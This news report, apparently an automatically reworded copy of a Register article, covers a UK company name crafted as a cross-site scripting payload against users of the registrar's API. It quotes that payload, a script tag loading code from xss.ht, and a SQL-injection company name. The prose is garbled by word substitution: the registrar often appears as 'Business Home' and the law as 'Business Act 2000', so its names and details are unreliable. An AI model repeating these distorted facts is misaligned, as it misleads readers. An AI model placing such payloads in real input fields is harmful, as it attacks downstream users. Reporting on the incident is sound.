Companies House has actually obstructed somebody who signed up a brand-new biz with a name that contained the ideal characters arranged in the right order to trigger a cross-site scripting (XSS) attack against users of the service’s API.
The company in question, registered number 12956509, was originally signed up with the UK’s official business registrar under the name:
" >< SCRIPT SRC[=] HTTPS[:]// MJT.XSS.HT > LTD.
Its name didn’t include the square brackets, implying anybody reading business names off the Business Home API would possibly run a script from the web address above.
A person utilizing the username michaeltandy on the Business Home developer forum later published: “I had assumed I would not be the first person to utilize < and > (they are, after all, both clearly whitelisted as legal characters) which 99 percent of systems would currently be escaping them … I would simply get a company with a playful name that would elicit an understanding chuckle from the type of people we ‘d be working with!”
The poster continued: “Once it turned out there were non-trivial issues, which reality became more commonly publicised, we can’t expect every consumer of information to do a full XSS audit in just a couple of days.”
Although whoever registered the company seems to have actually had non-hostile intentions– xss.ht is a domain owned by the XSS Hunter service, as described on its primary site— the vulnerability it exposes is not unique.
Such tomfoolery has been carried out in the past, helped by a legal requirement that particular punctuation marks are offered for business to utilize in their names. Thus was born “; DROP TABLE “COMPANIES”;– LTD” and “ SAFDASD & SFSAF ‘ SFDAASF ” LTD“, both of which were exploiting the schedule of punctuation marks to put commands into the business name field.
Tech attorney Neil Brown of decoded.legal informed The Register: “This is symbolic– if one might excuse the pun– of a regime which thinks about private characters in seclusion, and not the effect of the mix of those characters.” He explained that while area 53 of the Business Act 2000 does stop individuals from registering business with “offensive” names or names that were a criminal offense to release, it’s unclear whether that suffices to stop people signing up database commands as company names.
” Would using an XSS attack make up an offense? Even with the state of the Computer Misuse Act 1990, that would be a stretch too far. Is it offending? I do not think so, however then I’m not the Secretary of State,” suggested Brown, who likewise explained yet another crappy business name
As for lessons to be drawn from this, Brown questioned if just recommending individuals to sanitise inputs from official systems was “too dull” for El Reg We occur to concur but it’s also the sort of sensible recommendations somebody, someplace, might actually gain from. The BBC Bitesize guide to input sanitisation (don’t laugh, all of us started someplace) can be found here
A Companies House representative informed The Register: “A company was registered using characters that could have provided a security threat to a minimal variety of our customers, if published on vulnerable external websites. We have actually taken instant steps to mitigate this danger.”
He added: “We are confident that Business Home services stay safe and secure.”
And indeed Companies Home is safe and secure: company number 12956509 is now called “THAT COMPANY WHOSE NAME USED TO CONTAIN HTML SCRIPT TAGS LTD”. ®
Drop Table Companies Ltd (include the needed script marks at your leisure) was an useful joke by tech bod Sam Pizzey, who blogged about it at the time He composed: “The business name is a bit of hacker sleight-of-hand … or as some astute individuals have actually put it, it’s ‘wrong’.
Several people likewise signed up Openreach Ltd over the years till BT woke up and signed up the company name itself.